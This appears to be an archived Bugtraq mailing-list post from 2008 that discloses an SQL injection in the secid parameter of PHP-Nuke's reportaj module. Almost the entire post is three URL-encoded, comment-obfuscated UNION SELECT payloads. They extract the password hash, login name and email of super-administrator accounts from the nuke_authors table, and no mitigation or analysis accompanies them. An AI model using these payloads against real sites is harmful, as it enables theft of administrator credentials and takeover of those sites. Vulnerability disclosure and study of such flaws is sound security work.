[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

php-nuke sql injection reportaj [secid]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: php-nuke sql injection reportaj [secid]
From: lovebug@xxxxxxxxxx
Date: 26 Feb 2008 16:52:03 -0000



 PHP-Nuke (reportaj) SQL Injection Vulnerability  [secid]

#modules.php?name=roportaj&op=listarticles&secid=


pwd = 
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A


user= 
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A



email= 
-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cemail%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

Prev by Date: Nortel IP Phone DoS
Next by Date: [SECURITY] [DSA 1509-1] New koffice packages fix multiple vulnerabilities
Previous by thread: Re: Re: Nortel IP Phone DoS
Next by thread: [SECURITY] [DSA 1509-1] New koffice packages fix multiple vulnerabilities
Index(es):
- Date
- Thread